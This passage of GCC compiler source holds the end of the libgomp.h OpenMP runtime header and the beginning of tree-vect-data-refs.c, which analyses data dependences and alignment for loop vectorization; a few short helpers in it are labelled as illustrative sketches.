extern void gomp_acc_insert_pointer (size_t, void **, size_t *, void *);
extern void gomp_acc_remove_pointer (void *, bool, int, int);
extern struct target_mem_desc *gomp_map_vars (struct gomp_device_descr *,
size_t, void **, void **,
size_t *, void *, bool,
enum gomp_map_vars_kind);
extern void gomp_unmap_vars (struct target_mem_desc *, bool);
extern void gomp_init_device (struct gomp_device_descr *);
extern void gomp_free_memmap (struct splay_tree_s *);
extern void gomp_unload_device (struct gomp_device_descr *);
/* work.c */
extern void gomp_init_work_share (struct gomp_work_share *, bool, unsigned);
extern void gomp_fini_work_share (struct gomp_work_share *);
extern bool gomp_work_share_start (bool);
extern void gomp_work_share_end (void);
extern bool gomp_work_share_end_cancel (void);
extern void gomp_work_share_end_nowait (void);
static inline void
gomp_work_share_init_done (void)
{
struct gomp_thread *thr = gomp_thread ();
if (__builtin_expect (thr->ts.last_work_share != NULL, 1))
gomp_ptrlock_set (&thr->ts.last_work_share->next_ws, thr->ts.work_share);
}
#ifdef HAVE_ATTRIBUTE_VISIBILITY
# pragma GCC visibility pop
#endif
/* Now that we're back to default visibility, include the globals. */
#include "libgomp_g.h"
/* Include omp.h by parts. */
#include "omp-lock.h"
#define _LIBGOMP_OMP_LOCK_DEFINED 1
#include "omp.h.in"
#if !defined (HAVE_ATTRIBUTE_VISIBILITY) \
|| !defined (HAVE_ATTRIBUTE_ALIAS) \
|| !defined (HAVE_AS_SYMVER_DIRECTIVE) \
|| !defined (PIC) \
|| !defined (HAVE_SYMVER_SYMBOL_RENAMING_RUNTIME_SUPPORT)
# undef LIBGOMP_GNU_SYMBOL_VERSIONING
#endif
#ifdef LIBGOMP_GNU_SYMBOL_VERSIONING
extern void gomp_init_lock_30 (omp_lock_t *) __GOMP_NOTHROW;
extern void gomp_destroy_lock_30 (omp_lock_t *) __GOMP_NOTHROW;
extern void gomp_set_lock_30 (omp_lock_t *) __GOMP_NOTHROW;
extern void gomp_unset_lock_30 (omp_lock_t *) __GOMP_NOTHROW;
extern int gomp_test_lock_30 (omp_lock_t *) __GOMP_NOTHROW;
extern void gomp_init_nest_lock_30 (omp_nest_lock_t *) __GOMP_NOTHROW;
extern void gomp_destroy_nest_lock_30 (omp_nest_lock_t *) __GOMP_NOTHROW;
extern void gomp_set_nest_lock_30 (omp_nest_lock_t *) __GOMP_NOTHROW;
extern void gomp_unset_nest_lock_30 (omp_nest_lock_t *) __GOMP_NOTHROW;
extern int gomp_test_nest_lock_30 (omp_nest_lock_t *) __GOMP_NOTHROW;
extern void gomp_init_lock_25 (omp_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_destroy_lock_25 (omp_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_set_lock_25 (omp_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_unset_lock_25 (omp_lock_25_t *) __GOMP_NOTHROW;
extern int gomp_test_lock_25 (omp_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_init_nest_lock_25 (omp_nest_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_destroy_nest_lock_25 (omp_nest_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_set_nest_lock_25 (omp_nest_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_unset_nest_lock_25 (omp_nest_lock_25_t *) __GOMP_NOTHROW;
extern int gomp_test_nest_lock_25 (omp_nest_lock_25_t *) __GOMP_NOTHROW;
# define omp_lock_symver(fn) \
__asm (".symver g" #fn "_30, " #fn "@@OMP_3.0"); \
__asm (".symver g" #fn "_25, " #fn "@OMP_1.0");
#else
# define gomp_init_lock_30 omp_init_lock
# define gomp_destroy_lock_30 omp_destroy_lock
# define gomp_set_lock_30 omp_set_lock
# define gomp_unset_lock_30 omp_unset_lock
# define gomp_test_lock_30 omp_test_lock
# define gomp_init_nest_lock_30 omp_init_nest_lock
# define gomp_destroy_nest_lock_30 omp_destroy_nest_lock
# define gomp_set_nest_lock_30 omp_set_nest_lock
# define gomp_unset_nest_lock_30 omp_unset_nest_lock
# define gomp_test_nest_lock_30 omp_test_nest_lock
#endif
#ifdef HAVE_ATTRIBUTE_VISIBILITY
# define attribute_hidden __attribute__ ((visibility ("hidden")))
#else
# define attribute_hidden
#endif
#ifdef HAVE_ATTRIBUTE_ALIAS
# define strong_alias(fn, al) \
extern __typeof (fn) al __attribute__ ((alias (#fn)));
# define ialias_ulp ialias_str1(__USER_LABEL_PREFIX__)
# define ialias_str1(x) ialias_str2(x)
# define ialias_str2(x) #x
# define ialias(fn) \
extern __typeof (fn) gomp_ialias_##fn \
__attribute__ ((alias (#fn))) attribute_hidden;
# define ialias_redirect(fn) \
extern __typeof (fn) fn __asm__ (ialias_ulp "gomp_ialias_" #fn) attribute_hidden;
# define ialias_call(fn) gomp_ialias_ ## fn
#else
# define ialias(fn)
# define ialias_redirect(fn)
# define ialias_call(fn) fn
#endif
/* Helper function for priority_node_to_task() and
task_to_priority_node().
Return the offset from a task to its priority_node entry. The
priority_node entry has type TYPE. */
static inline size_t
priority_queue_offset (enum priority_queue_type type)
{
return offsetof (struct gomp_task, pnode[(int) type]);
}
/* Return the task associated with a priority NODE of type TYPE. */
static inline struct gomp_task *
priority_node_to_task (enum priority_queue_type type,
struct priority_node *node)
{
return (struct gomp_task *) ((char *) node - priority_queue_offset (type));
}
/* Return the priority node of type TYPE for a given TASK. */
static inline struct priority_node *
task_to_priority_node (enum priority_queue_type type,
struct gomp_task *task)
{
return (struct priority_node *) ((char *) task
+ priority_queue_offset (type));
}
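/* Illustrative check, not part of libgomp: the two conversions above are
   inverses, so a round trip through the priority node recovers the owning
   task.  */
static inline int
example_pnode_round_trip (enum priority_queue_type type,
                          struct gomp_task *task)
{
  return priority_node_to_task (type, task_to_priority_node (type, task))
         == task;
}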
#endif /* LIBGOMP_H */
|
tree-vect-data-refs.c | /* Data References Analysis and Manipulation Utilities for Vectorization.
Copyright (C) 2003-2015 Free Software Foundation, Inc.
Contributed by Dorit Naishlos <dorit@il.ibm.com>
and Ira Rosen <irar@il.ibm.com>
This file is part of GCC.
GCC is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation; either version 3, or (at your option) any later
version.
GCC is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
for more details.
You should have received a copy of the GNU General Public License
along with GCC; see the file COPYING3. If not see
<http://www.gnu.org/licenses/>. */
#include "config.h"
#include "system.h"
#include "coretypes.h"
#include "dumpfile.h"
#include "tm.h"
#include "hash-set.h"
#include "machmode.h"
#include "vec.h"
#include "double-int.h"
#include "input.h"
#include "alias.h"
#include "symtab.h"
#include "wide-int.h"
#include "inchash.h"
#include "tree.h"
#include "fold-const.h"
#include "stor-layout.h"
#include "tm_p.h"
#include "target.h"
#include "predict.h"
#include "hard-reg-set.h"
#include "function.h"
#include "dominance.h"
#include "cfg.h"
#include "basic-block.h"
#include "gimple-pretty-print.h"
#include "tree-ssa-alias.h"
#include "internal-fn.h"
#include "tree-eh.h"
#include "gimple-expr.h"
#include "is-a.h"
#include "gimple.h"
#include "gimplify.h"
#include "gimple-iterator.h"
#include "gimplify-me.h"
#include "gimple-ssa.h"
#include "tree-phinodes.h"
#include "ssa-iterators.h"
#include "stringpool.h"
#include "tree-ssanames.h"
#include "tree-ssa-loop-ivopts.h"
#include "tree-ssa-loop-manip.h"
#include "tree-ssa-loop.h"
#include "cfgloop.h"
#include "tree-chrec.h"
#include "tree-scalar-evolution.h"
#include "tree-vectorizer.h"
#include "diagnostic-core.h"
#include "hash-map.h"
#include "plugin-api.h"
#include "ipa-ref.h"
#include "cgraph.h"
/* Need to include rtl.h, expr.h, etc. for optabs. */
#include "hashtab.h"
#include "rtl.h"
#include "flags.h"
#include "statistics.h"
#include "real.h"
#include "fixed-value.h"
#include "insn-config.h"
#include "expmed.h"
#include "dojump.h"
#include "explow.h"
#include "calls.h"
#include "emit-rtl.h"
#include "varasm.h"
#include "stmt.h"
#include "expr.h"
#include "insn-codes.h"
#include "optabs.h"
#include "builtins.h"
/* Return true if load- or store-lanes optab OPTAB is implemented for
COUNT vectors of type VECTYPE. NAME is the name of OPTAB. */
static bool
vect_lanes_optab_supported_p (const char *name, convert_optab optab,
tree vectype, unsigned HOST_WIDE_INT count)
{
machine_mode mode, array_mode;
bool limit_p;
mode = TYPE_MODE (vectype);
limit_p = !targetm.array_mode_supported_p (mode, count);
array_mode = mode_for_size (count * GET_MODE_BITSIZE (mode),
MODE_INT, limit_p);
if (array_mode == BLKmode)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"no array mode for %s[" HOST_WIDE_INT_PRINT_DEC "]\n",
GET_MODE_NAME (mode), count);
return false;
}
if (convert_optab_handler (optab, array_mode, mode) == CODE_FOR_nothing)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"cannot use %s<%s><%s>\n", name,
GET_MODE_NAME (array_mode), GET_MODE_NAME (mode));
return false;
}
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"can use %s<%s><%s>\n", name, GET_MODE_NAME (array_mode),
GET_MODE_NAME (mode));
return true;
}
/* Return the smallest scalar part of STMT.
This is used to determine the vectype of the stmt. We generally set the
vectype according to the type of the result (lhs). For stmts whose
result-type is different than the type of the arguments (e.g., demotion,
promotion), vectype will be reset appropriately (later). Note that we have
to visit the smallest datatype in this function, because that determines the
VF. If the smallest datatype in the loop is present only as the rhs of a
promotion operation - we'd miss it.
Such a case, where a variable of this datatype does not appear in the lhs
anywhere in the loop, can only occur if it's an invariant: e.g.:
'int_x = (int) short_inv', which we'd expect to have been optimized away by
invariant motion. However, we cannot rely on invariant motion to always
take invariants out of the loop, and so in the case of promotion we also
have to check the rhs.
LHS_SIZE_UNIT and RHS_SIZE_UNIT contain the sizes of the corresponding
types. */
tree
vect_get_smallest_scalar_type (gimple stmt, HOST_WIDE_INT *lhs_size_unit,
HOST_WIDE_INT *rhs_size_unit)
{
tree scalar_type = gimple_expr_type (stmt);
HOST_WIDE_INT lhs, rhs;
lhs = rhs = TREE_INT_CST_LOW (TYPE_SIZE_UNIT (scalar_type));
if (is_gimple_assign (stmt)
&& (gimple_assign_cast_p (stmt)
|| gimple_assign_rhs_code (stmt) == WIDEN_MULT_EXPR
|| gimple_assign_rhs_code (stmt) == WIDEN_LSHIFT_EXPR
|| gimple_assign_rhs_code (stmt) == FLOAT_EXPR))
{
tree rhs_type = TREE_TYPE (gimple_assign_rhs1 (stmt));
rhs = TREE_INT_CST_LOW (TYPE_SIZE_UNIT (rhs_type));
if (rhs < lhs)
scalar_type = rhs_type;
}
*lhs_size_unit = lhs;
*rhs_size_unit = rhs;
return scalar_type;
}
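/* Conceptual sketch in plain C, not GCC internals: for a promotion such as
   int_x = (int) short_inv, the smallest scalar type is the 2-byte rhs
   type, so the vectorization factor is derived from it rather than from
   the lhs.  With hypothetical 16-byte vectors, VF = 16 / sizeof (short)
   = 8.  */
static inline int
example_vf_from_smallest_type (int vector_bytes, int lhs_size, int rhs_size)
{
  int smallest = rhs_size < lhs_size ? rhs_size : lhs_size;
  return vector_bytes / smallest;
}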
/* Insert DDR into LOOP_VINFO list of ddrs that may alias and need to be
tested at run-time. Return TRUE if DDR was successfully inserted.
Return false if versioning is not supported. */
static bool
vect_mark_for_runtime_alias_test (ddr_p ddr, loop_vec_info loop_vinfo)
{
struct loop *loop = LOOP_VINFO_LOOP (loop_vinfo);
if ((unsigned) PARAM_VALUE (PARAM_VECT_MAX_VERSION_FOR_ALIAS_CHECKS) == 0)
return false;
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"mark for run-time aliasing test between ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (DDR_A (ddr)));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (DDR_B (ddr)));
dump_printf (MSG_NOTE, "\n");
}
if (optimize_loop_nest_for_size_p (loop))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning not supported when optimizing"
" for size.\n");
return false;
}
/* FORNOW: We don't support versioning with outer-loop vectorization. */
if (loop->inner)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning not yet supported for outer-loops.\n");
return false;
}
/* FORNOW: We don't support creating runtime alias tests for non-constant
step. */
if (TREE_CODE (DR_STEP (DDR_A (ddr))) != INTEGER_CST
|| TREE_CODE (DR_STEP (DDR_B (ddr))) != INTEGER_CST)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning not yet supported for non-constant "
"step\n");
return false;
}
LOOP_VINFO_MAY_ALIAS_DDRS (loop_vinfo).safe_push (ddr);
return true;
}
/* Function vect_analyze_data_ref_dependence.
Return TRUE if there (might) exist a dependence between a memory-reference
DRA and a memory-reference DRB. When the dependence can instead be checked
at run-time by versioning for alias, return FALSE. Adjust *MAX_VF according to
the data dependence. */
static bool
vect_analyze_data_ref_dependence (struct data_dependence_relation *ddr,
loop_vec_info loop_vinfo, int *max_vf)
{
unsigned int i;
struct loop *loop = LOOP_VINFO_LOOP (loop_vinfo);
struct data_reference *dra = DDR_A (ddr);
struct data_reference *drb = DDR_B (ddr);
stmt_vec_info stmtinfo_a = vinfo_for_stmt (DR_STMT (dra));
stmt_vec_info stmtinfo_b = vinfo_for_stmt (DR_STMT (drb));
lambda_vector dist_v;
unsigned int loop_depth;
/* In loop analysis all data references should be vectorizable. */
if (!STMT_VINFO_VECTORIZABLE (stmtinfo_a)
|| !STMT_VINFO_VECTORIZABLE (stmtinfo_b))
gcc_unreachable ();
/* Independent data accesses. */
if (DDR_ARE_DEPENDENT (ddr) == chrec_known)
return false;
if (dra == drb
|| (DR_IS_READ (dra) && DR_IS_READ (drb)))
return false;
/* Even if we have an anti-dependence then, as the vectorized loop covers at
least two scalar iterations, there is always also a true dependence.
As the vectorizer does not re-order loads and stores we can ignore
the anti-dependence if TBAA can disambiguate both DRs similar to the
case with known negative distance anti-dependences (positive
distance anti-dependences would violate TBAA constraints). */
if (((DR_IS_READ (dra) && DR_IS_WRITE (drb))
|| (DR_IS_WRITE (dra) && DR_IS_READ (drb)))
&& !alias_sets_conflict_p (get_alias_set (DR_REF (dra)),
get_alias_set (DR_REF (drb))))
return false;
/* Unknown data dependence. */
if (DDR_ARE_DEPENDENT (ddr) == chrec_dont_know)
{
/* If user asserted safelen consecutive iterations can be
executed concurrently, assume independence. */
if (loop->safelen >= 2)
{
if (loop->safelen < *max_vf)
*max_vf = loop->safelen;
LOOP_VINFO_NO_DATA_DEPENDENCIES (loop_vinfo) = false;
return false;
}
if (STMT_VINFO_GATHER_P (stmtinfo_a)
|| STMT_VINFO_GATHER_P (stmtinfo_b))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning for alias not supported for: "
"can't determine dependence between ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (dra));
dump_printf (MSG_MISSED_OPTIMIZATION, " and ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return true;
}
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning for alias required: "
"can't determine dependence between ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (dra));
dump_printf (MSG_MISSED_OPTIMIZATION, " and ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
/* Add to list of ddrs that need to be tested at run-time. */
return !vect_mark_for_runtime_alias_test (ddr, loop_vinfo);
}
/* Known data dependence. */
if (DDR_NUM_DIST_VECTS (ddr) == 0)
{
/* If user asserted safelen consecutive iterations can be
executed concurrently, assume independence. */
if (loop->safelen >= 2)
{
if (loop->safelen < *max_vf)
*max_vf = loop->safelen;
LOOP_VINFO_NO_DATA_DEPENDENCIES (loop_vinfo) = false;
return false;
}
if (STMT_VINFO_GATHER_P (stmtinfo_a)
|| STMT_VINFO_GATHER_P (stmtinfo_b))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning for alias not supported for: "
"bad dist vector for ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (dra));
dump_printf (MSG_MISSED_OPTIMIZATION, " and ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return true;
}
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"versioning for alias required: "
"bad dist vector for ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_MISSED_OPTIMIZATION, " and ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
/* Add to list of ddrs that need to be tested at run-time. */
return !vect_mark_for_runtime_alias_test (ddr, loop_vinfo);
}
loop_depth = index_in_loop_nest (loop->num, DDR_LOOP_NEST (ddr));
FOR_EACH_VEC_ELT (DDR_DIST_VECTS (ddr), i, dist_v)
{
int dist = dist_v[loop_depth];
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"dependence distance = %d.\n", dist);
if (dist == 0)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"dependence distance == 0 between ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_NOTE, "\n");
}
/* When we perform grouped accesses and perform implicit CSE
by detecting equal accesses and doing disambiguation with
runtime alias tests like for
.. = a[i];
.. = a[i+1];
a[i] = ..;
a[i+1] = ..;
*p = ..;
.. = a[i];
.. = a[i+1];
where we will end up loading { a[i], a[i+1] } once, make
sure that inserting group loads before the first load and
stores after the last store will do the right thing.
Similar for groups like
a[i] = ...;
... = a[i];
a[i+1] = ...;
where loads from the group interleave with the store. */
if (STMT_VINFO_GROUPED_ACCESS (stmtinfo_a)
|| STMT_VINFO_GROUPED_ACCESS (stmtinfo_b))
{
gimple earlier_stmt;
earlier_stmt = get_earlier_stmt (DR_STMT (dra), DR_STMT (drb));
if (DR_IS_WRITE
(STMT_VINFO_DATA_REF (vinfo_for_stmt (earlier_stmt))))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"READ_WRITE dependence in interleaving."
"\n");
return true;
}
}
continue;
}
if (dist > 0 && DDR_REVERSED_P (ddr))
{
/* If DDR_REVERSED_P the order of the data-refs in DDR was
reversed (to make distance vector positive), and the actual
distance is negative. */
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"dependence distance negative.\n");
/* Record a negative dependence distance to later limit the
amount of stmt copying / unrolling we can perform.
Only need to handle read-after-write dependence. */
if (DR_IS_READ (drb)
&& (STMT_VINFO_MIN_NEG_DIST (stmtinfo_b) == 0
|| STMT_VINFO_MIN_NEG_DIST (stmtinfo_b) > (unsigned)dist))
STMT_VINFO_MIN_NEG_DIST (stmtinfo_b) = dist;
continue;
}
if (abs (dist) >= 2
&& abs (dist) < *max_vf)
{
/* The dependence distance requires reduction of the maximal
vectorization factor. */
*max_vf = abs (dist);
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"adjusting maximal vectorization factor to %i\n",
*max_vf);
}
if (abs (dist) >= *max_vf)
{
/* In this case the dependence distance does not create a dependence,
as far as vectorization is concerned. */
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"dependence distance >= VF.\n");
continue;
}
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized, possible dependence "
"between data-refs ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_MISSED_OPTIMIZATION, " and ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return true;
}
return false;
}
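/* Conceptual sketch, not GCC internals: the distance test applied above.
   A dependence at distance DIST is harmless for vectorization when
   |DIST| >= VF, because a single vector iteration then never spans both
   endpoints of the dependence.  */
static inline int
example_distance_allows_vf (int dist, int vf)
{
  return (dist < 0 ? -dist : dist) >= vf;
}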
/* Function vect_analyze_data_ref_dependences.
Examine all the data references in the loop, and make sure there do not
exist any data dependences between them. Set *MAX_VF according to
the maximum vectorization factor the data dependences allow. */
bool
vect_analyze_data_ref_dependences (loop_vec_info loop_vinfo, int *max_vf)
{
unsigned int i;
struct data_dependence_relation *ddr;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_analyze_data_ref_dependences ===\n");
LOOP_VINFO_NO_DATA_DEPENDENCIES (loop_vinfo) = true;
if (!compute_all_dependences (LOOP_VINFO_DATAREFS (loop_vinfo),
&LOOP_VINFO_DDRS (loop_vinfo),
LOOP_VINFO_LOOP_NEST (loop_vinfo), true))
return false;
FOR_EACH_VEC_ELT (LOOP_VINFO_DDRS (loop_vinfo), i, ddr)
if (vect_analyze_data_ref_dependence (ddr, loop_vinfo, max_vf))
return false;
return true;
}
/* Function vect_slp_analyze_data_ref_dependence.
Return TRUE if there (might) exist a dependence between a memory-reference
DRA and a memory-reference DRB. When the dependence can instead be
checked at run-time by versioning for alias, return FALSE. */
static bool
vect_slp_analyze_data_ref_dependence (struct data_dependence_relation *ddr)
{
struct data_reference *dra = DDR_A (ddr);
struct data_reference *drb = DDR_B (ddr);
/* We need to check dependences of statements marked as unvectorizable
as well, they still can prohibit vectorization. */
/* Independent data accesses. */
if (DDR_ARE_DEPENDENT (ddr) == chrec_known)
return false;
if (dra == drb)
return false;
/* Read-read is OK. */
if (DR_IS_READ (dra) && DR_IS_READ (drb))
return false;
/* If dra and drb are part of the same interleaving chain consider
them independent. */
if (STMT_VINFO_GROUPED_ACCESS (vinfo_for_stmt (DR_STMT (dra)))
&& (GROUP_FIRST_ELEMENT (vinfo_for_stmt (DR_STMT (dra)))
== GROUP_FIRST_ELEMENT (vinfo_for_stmt (DR_STMT (drb)))))
return false;
/* Unknown data dependence. */
if (DDR_ARE_DEPENDENT (ddr) == chrec_dont_know)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"can't determine dependence between ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_MISSED_OPTIMIZATION, " and ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
}
else if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"determined dependence between ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_NOTE, "\n");
}
/* We do not vectorize basic blocks with write-write dependencies. */
if (DR_IS_WRITE (dra) && DR_IS_WRITE (drb))
return true;
/* If we have a read-write dependence, check that the load is before the
store. When we vectorize basic blocks, a vector load can only be placed
before the corresponding scalar load, and a vector store can only be
placed after its corresponding scalar store, so the order of the accesses
is preserved when the load is before the store. */
gimple earlier_stmt = get_earlier_stmt (DR_STMT (dra), DR_STMT (drb));
if (DR_IS_READ (STMT_VINFO_DATA_REF (vinfo_for_stmt (earlier_stmt))))
{
/* That only holds for load-store pairs taking part in vectorization. */
if (STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dra)))
&& STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (drb))))
return false;
}
return true;
}
/* Function vect_slp_analyze_data_ref_dependences.
Examine all the data references in the basic-block, and make sure there
do not exist any data dependences between them. */
bool
vect_slp_analyze_data_ref_dependences (bb_vec_info bb_vinfo)
{
struct data_dependence_relation *ddr;
unsigned int i;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_slp_analyze_data_ref_dependences ===\n");
if (!compute_all_dependences (BB_VINFO_DATAREFS (bb_vinfo),
&BB_VINFO_DDRS (bb_vinfo),
vNULL, true))
return false;
FOR_EACH_VEC_ELT (BB_VINFO_DDRS (bb_vinfo), i, ddr)
if (vect_slp_analyze_data_ref_dependence (ddr))
return false;
return true;
}
/* Function vect_compute_data_ref_alignment
Compute the misalignment of the data reference DR.
Output:
1. If during the misalignment computation it is found that the data reference
cannot be vectorized then false is returned.
2. DR_MISALIGNMENT (DR) is defined.
FOR NOW: No analysis is actually performed. Misalignment is calculated
only for trivial cases. TODO. */
static bool
vect_compute_data_ref_alignment (struct data_reference *dr)
{
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
struct loop *loop = NULL;
tree ref = DR_REF (dr);
tree vectype;
tree base, base_addr;
bool base_aligned;
tree misalign;
tree aligned_to;
unsigned HOST_WIDE_INT alignment;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"vect_compute_data_ref_alignment:\n");
if (loop_vinfo)
loop = LOOP_VINFO_LOOP (loop_vinfo);
/* Initialize misalignment to unknown. */
SET_DR_MISALIGNMENT (dr, -1);
/* Strided loads perform only component accesses, misalignment information
is irrelevant for them. */
if (STMT_VINFO_STRIDE_LOAD_P (stmt_info))
return true;
misalign = DR_INIT (dr);
aligned_to = DR_ALIGNED_TO (dr);
base_addr = DR_BASE_ADDRESS (dr);
vectype = STMT_VINFO_VECTYPE (stmt_info);
/* In case the dataref is in an inner-loop of the loop that is being
vectorized (LOOP), we use the base and misalignment information
relative to the outer-loop (LOOP). This is ok only if the misalignment
stays the same throughout the execution of the inner-loop, which is why
we have to check that the stride of the dataref in the inner-loop is a
multiple of the vector size. */
if (loop && nested_in_vect_loop_p (loop, stmt))
{
tree step = DR_STEP (dr);
HOST_WIDE_INT dr_step = TREE_INT_CST_LOW (step);
if (dr_step % GET_MODE_SIZE (TYPE_MODE (vectype)) == 0)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"inner step divides the vector-size.\n");
misalign = STMT_VINFO_DR_INIT (stmt_info);
aligned_to = STMT_VINFO_DR_ALIGNED_TO (stmt_info);
base_addr = STMT_VINFO_DR_BASE_ADDRESS (stmt_info);
}
else
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"inner step doesn't divide the vector-size.\n");
misalign = NULL_TREE;
}
}
/* Similarly, if we're doing basic-block vectorization, we can only use
base and misalignment information relative to an innermost loop if the
misalignment stays the same throughout the execution of the loop.
As above, this is the case if the stride of the dataref is a multiple
of the vector size. */
if (!loop)
{
tree step = DR_STEP (dr);
HOST_WIDE_INT dr_step = TREE_INT_CST_LOW (step);
if (dr_step % GET_MODE_SIZE (TYPE_MODE (vectype)) != 0)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"SLP: step doesn't divide the vector-size.\n");
misalign = NULL_TREE;
}
}
alignment = TYPE_ALIGN_UNIT (vectype);
if ((compare_tree_int (aligned_to, alignment) < 0)
|| !misalign)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Unknown alignment for access: ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, ref);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return true;
}
/* To look at alignment of the base we have to preserve an inner MEM_REF
as that carries alignment information of the actual access. */
base = ref;
while (handled_component_p (base))
base = TREE_OPERAND (base, 0);
if (TREE_CODE (base) == MEM_REF)
base = build2 (MEM_REF, TREE_TYPE (base), base_addr,
build_int_cst (TREE_TYPE (TREE_OPERAND (base, 1)), 0));
if (get_object_alignment (base) >= TYPE_ALIGN (vectype))
base_aligned = true;
else
base_aligned = false;
if (!base_aligned)
{
/* Strip an inner MEM_REF to a bare decl if possible. */
if (TREE_CODE (base) == MEM_REF
&& integer_zerop (TREE_OPERAND (base, 1))
&& TREE_CODE (TREE_OPERAND (base, 0)) == ADDR_EXPR)
base = TREE_OPERAND (TREE_OPERAND (base, 0), 0);
if (!vect_can_force_dr_alignment_p (base, TYPE_ALIGN (vectype)))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"can't force alignment of ref: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, ref);
dump_printf (MSG_NOTE, "\n");
}
return true;
}
/* Force the alignment of the decl.
NOTE: This is the only change to the code we make during
the analysis phase, before deciding to vectorize the loop. */
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location, "force alignment of ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, ref);
dump_printf (MSG_NOTE, "\n");
}
((dataref_aux *)dr->aux)->base_decl = base;
((dataref_aux *)dr->aux)->base_misaligned = true;
}
